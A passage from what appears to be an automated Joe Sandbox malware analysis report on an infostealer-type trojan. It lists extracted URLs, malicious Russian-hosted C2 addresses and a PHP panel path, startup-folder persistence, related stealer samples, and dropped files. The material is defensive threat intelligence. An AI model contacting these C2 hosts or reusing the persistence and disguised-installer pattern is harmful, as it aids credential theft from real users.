http://www.symauth.com/cps0(	Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	false
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	false
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php#	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php$	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
http://www.symauth.com/rpa00	Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	false
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://www.info-zip.org/	Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.0000000004348000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.000000000525D000.00000004.00000800.00020000.00000000.sdmp	false
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://185.172.128.76	u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmp	true
https://scripts.sil.org/OFLV	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2649497806.00000256725E0000.00000004.00000020.00020000.00000000.sdmp	false
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	false
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpB	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://ocsp.sectigo.com0	zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeeeC	u48o.1.exe, 0000000E.00000003.1723626996.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	false
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php/	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76H	u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com	zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php7	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpa	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	false
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpf	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpk	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpMM	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://sectigo.com/CPS0D	zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	false
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430197
Start date and time:	2024-04-23 09:42:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zLwT7vCojz.exe renamed because original name is a hash value
Original Sample Name:	577592f54bb4b19d416913b1816f7971.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@26/89@5/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 108 Number of non-executed functions: 258
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.119.6.228, 40.126.28.11, 40.126.28.21, 40.126.28.23, 40.126.28.14, 40.126.28.19, 40.126.28.18, 40.126.7.32, 40.126.28.20, 199.232.214.172, 20.114.59.183, 20.3.187.198, 192.229.211.108, 199.232.210.172, 52.168.117.172, 52.165.164.15, 13.89.179.12, 23.62.24.116, 20.9.155.150
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, onedsblobprdeus07.eastus.cloudapp.azure.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:34:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT85A2.tmp
11:34:46	API Interceptor	2x Sleep call for process: WerFault.exe modified
11:34:56	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tzgsecure.lnk
11:35:03	API Interceptor	321038x Sleep call for process: MSBuild.exe modified
11:35:06	API Interceptor	298547x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	JARlqZLmeA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
iolo0.b-cdn.net	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.244
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.243
	40jnt39QJ2.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	Fvp0GQnESU.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	hSWW0sdgfj.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.99
	xPudQBV1wJ.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	011876zHjm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	6EKLugdUZ8.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	bRa3UYfQxA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.243
svc.iolo.com	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	JARlqZLmeA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
note.padd.cn.com	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	JARlqZLmeA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
bg.microsoft.map.fastly.net	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	199.232.210.172
	https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1	Get hash	malicious	Unknown	Browse	199.232.210.172
	TRANSPORT_INSTRUCTION_MR.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	199.232.210.172
	https://39.104-168-101-28.cprapid.com/Pay-PaI/	Get hash	malicious	PayPal Phisher	Browse	199.232.210.172
	https://ddf29-secondary.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-888-365-4337	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	https://kjhasdjfjahdsfjbjafjb.z19.web.core.windows.net/Er0Win8helpline76/index.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://apppks011.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-877-200-1312	Get hash	malicious	TechSupportScam	Browse	199.232.214.172
	https://pub-4b7bb8835c824e67a15332b376de2d9d.r2.dev/mafo.html	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	40jnt39QJ2.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	199.232.214.172
	xPudQBV1wJ.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	b94bd24023b0df0089295b2246546a256d3e82424ecdb.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	4JgB4mYxvJ.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	q27UFusYdn.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	ipR98bCqps.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	WF2R8Bsptu.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	5F25UVdGxt.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DUKNXICOZT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694015263253693
Encrypted:	false
SSDEEP:	24:pE8hRSoFxFv2tFu66PaDs7Wya/4QEssgd8uS:pE8nSoFxFvaCgoWc/gd8L
MD5:	CA67F06C14A077335756DA58259702DC
SHA1:	38A16C7089B83C544B5A58A1A91EE36AB2EE7F38
SHA-256:	6EDC691DABB9C6D794637CB2149341BB454C0490C01BBEF92C3BD48BB86B2329
SHA-512:	1754DE4F4BAC84BD0D0E605157AEFD00599B1641042A3F77AEA16614FE595B7090595C982C1679D910C20A2BF53936BAB648FF31C2CF82F3F9AD985D22EA14E8
Malicious:	false
Reputation:	unknown
Preview:	DUKNXICOZTGLPDSRRQNKVCEQUFBSMCGTLOLLPKYXLUAXKQNZYDHXTQPNHHFHJTMIGEVVJMXNTUPFEQSTIPWCYHGFUQMXUYJBEEKJNRRCNFODXCAMAXLAZTIQUNTNPGERBSYITUYWBHPPZHKLUNSGUFMHVRZKTGCTKCZZJDJJKZRDBOFQSLPJQVAUHFJGITHWOZYPLVWBUXHBXXXJUCPJMVLNEPNKDIZKYGMCDARTHGXLNZDXRLUSQRQMRUGCFVVHERGNVXKXGPTCXBJJSYOTZHCRWDCIILVDANNRVWIHRUKXNEWVKZLEBJFPCBFWGQGWGNAHYWNRYILMVTJYSQGDDEIOTQFNFCPBIFXMUECMBHHGKFHGYAPHBDYRWVLPTNZQXENCWRMKRIQEHFZXOHUQUMEVRRXBUGYMSBZKQNTNXORTCHQQTODUBHKLIIDLWFSVAULMVBXACHFRLSBSAGSWTRHIIZFLUSWOCTUGDAHTWKZBYIVQRRYRKRAUTQQLIUHDWFKYDUVNGBMEZUTAFTTKYLQLJJTEVOLXVXBJATRZJRTOISUFLOLZCIBSUKLPDJXJBNUXCGPOLEGGOYZSOMTIWZMXNMUQTDLWGLIFCOJBEBCJQCSUDSWMKJERKRVNPKGTBPKKHLFCUULARSYSMUUYOBVXGHJPZEQKZTIWHIOQYDFCLYHJZKEDUCRZKCLMBUTIQDOHZOSLLXZMPKRTSVSHOIOGCLWGQOYRPDVACEIULCNRQDMRTSTZBWQMCLPDYWEXUCNSMFNSLTBNUAJKDHOPGLEHJPRKNWCKRZSOJXBNVSNBJBRTNVXHVKISJRPDYQBKOXYGOTQXOJKNGSOSFTFSIVNPFOAYLIRBSAREFWQPLONYPUBHJPFGRFFPXAQEEPWYSTOTGMJMHXBQMNEWRCBJRORHQBKISQFFCDYLOWZILZFBCXTYETKBEANFDVZBQHUOSIHHQTXPKVPTCPOPJEEGGSIDPOLYQHTCFCAHOXRL

C:\ProgramData\DWTHNHNNJB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.706547634051575
